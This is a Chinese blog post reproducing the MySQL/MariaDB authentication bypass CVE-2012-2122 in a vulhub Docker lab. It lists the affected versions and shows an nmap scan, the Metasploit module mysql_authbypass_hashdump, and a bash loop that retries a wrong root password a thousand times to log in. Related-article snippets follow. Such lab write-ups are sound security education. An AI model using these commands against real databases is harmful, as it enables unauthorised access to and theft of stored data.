mysql身份认证绕过漏洞复现(CVE-2012-2122)

已于 2023-12-25 01:33:45 修改
阅读量861 收藏 5
点赞数 4
文章标签: 网络安全 web安全
于 2023-03-12 14:24:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53730939/article/details/129474750
版权

漏洞描述

当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp() 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入 SQL 数据库。

漏洞危害

漏洞泄露了数据库等关键敏感信息,如果被篡改数据库信息其危害较大

受版本影响

  • MySQL 5.1.x before 5.1.63

  • 5.5.x before 5.5.24,

  • 5.6.x before 5.6.6,

  • MariaDB 5.1.x before 5.1.62,

  •    5.2.x before 5.2.12

  •   5.3.x before 5.3.6

  • 5.5.x before 5.5.23

 

主机准备

一台ubuntu(192.168.8.158),一台kail

均处于同一内网环境下。

其中kail作为攻击主机,ubuntu作为受害主机。

 

环境搭建

  • 进入vulhub-master目录环境:

25a0e3978cb0ad6a9c1fd6b8a55564a7.png

 

  • 执行如下命令:


docker-compose up -d
09def2237356501b327204a03a9a948e.png

dokcer ps 查看进程是否启动

751dc392b75f622fb66c4644cfd43ee8.png

访问3306端口查看环境

cedb4b53c4c110c4de322c5e07b9f4a3.png

此时环境搭建成功

 

nmap -T4 -sV -O -p 3306 192.168.8.158

进行端口扫描发现靶机开启3306端口,并且mysql版本5.5.23

5c3d58b9f194eb1b457c32ab9ca4543c.png

 

漏洞复现

第一种:

使用Meterpreter

msfconsole

ea8cb04f45c3c9dea592067ab94a8b97.png

search CVE-2012-2122

a9c6b5e6381e63ef047b4608536ac217.png

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

f7b985f28445436638fe07dc29cf87e6.png

show options

4c47fd5d00a7d24ccab71976397c5200.png

set RHOSTS 192.168.8.158

 

set THREADS 20

79fe938b6a9ae16eb050ca8dff948e56.png

run

8a41cab73d4e105482db96178ef3ec3b.png

这里可能是msf有些许问题导致没有爆出root密码

如果有同学和我有相似问题可以参考以下方法

 

第二种:

使用shell脚本

先使用正确的密码登录看看是否成功启动环境

在kail主机的命令行输入命令

mysql -h 192.168.8.208 -u root -p123456 -P3306(如果提示连接次数过多请重启环境)

bfb345765b6b9c100d485e245c91140b.png

 

编写如下shell脚本,并执行

payload.sh

17aadb68ac758c2cba552b689534c31a.png 

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.8.208 -P3306 ; done

注:将ip改为自己的

命令行执行

切换到脚本存放路径


bash payload.sh
5bc7e4484cd2bd9adc0d87acf42cc6eb.png

此时复现成功

 

 

hh_y
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" 是IIS提供的一个特性,提供了黑白名单,来限制用户对web资源的访问。由于没有合适的对比"IP and domain restriction" filtering list 与客户外部请求,导致攻击者可以构造特定的请求突破访问限制。 Microsoft --------- Microsoft已经为此发布了一个安全公告(MS14-076)以及相应补丁: MS14-076:Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) 链接:https://technet.microsoft.com/zh-cn/library/security/MS14-076.aspx
Mysql CVE-2012-2122(vulhub)漏洞复现
MDSEC的博客
08-23 211
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析
gg1229505432的博客
02-13 5160
MySQL Connectors组件8.0.12及之前版本的Connector/J子组件存在安全漏洞及其相关性分析
复现 CVE2012-2122漏洞 ,用两种攻击方式复现
weixin_64655821的博客
08-26 908
复现 CVE2012-2122漏洞 ,用两种攻击方式复现 复现mysql 备份上传木马,并用shell工具连接操作
MySQL 漏洞利用与提权
weixin_50464560的博客
07-15 2350
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安全以来就 MySQL 的 UDF 提权、MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL 的用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4577
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
Mysql 身份认证绕过漏洞CVE-2012-2122
最新发布
m0_63521991的博客
10-19 534
CVE-2012-2122MySQL 数据库中的一个身份认证绕过漏洞,也被称为 "MySQL Authentication Bypass" 漏洞。该漏洞的核心原理涉及到 MySQL 在处理身份认证时的一个安全缺陷,使得攻击者可以绕过身份认证并以未经授权的方式访问数据库。
漏洞CVE 2012-2122复现——Mysql身份验证绕过
人若有志,就不会在半坡停止。
08-25 941
漏洞CVE 2012-2122复现——Mysql身份验证绕过
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2152
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
jboss4版本修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)升级包
04-25
jboss4版本下,jbossweb-tomcat55.sar升级包,修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439) 升级包中的jar来源于tomcat5.5.36 使用方法:直接替换jboss中旧的jbossweb-tomcat55.sar
spring boot 解决Apache Shiro身份认证绕过漏洞CVE-2023-22602)
06-02
对于Spring Boot项目中的Apache Shiro身份认证绕过漏洞CVE-2023-22602),可以通过以下步骤进行解决: 1.升级Apache Shiro到1.7.1或更高版本。可以在项目的Maven或Gradle依赖中更新Apache Shiro的版本。 2.检查应用程序的Shiro配置文件,确保已正确配置了身份认证。例如,应该使用密码哈希来存储用户的密码,并使用适当的加密算法来保护密码。 3.禁用Shiro的RememberMe功能,以防止身份验证绕过攻击。可以在Shiro配置文件中添加以下配置: ``` securityManager.rememberMeManager.cookie.enabled = false ``` 这将禁用RememberMe cookie。 4.限制登录尝试次数,以防止暴力攻击。可以使用Spring Security等其他安全框架来实现此功能。 这些措施可以有效地防止Apache Shiro身份认证绕过漏洞CVE-2023-22602)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值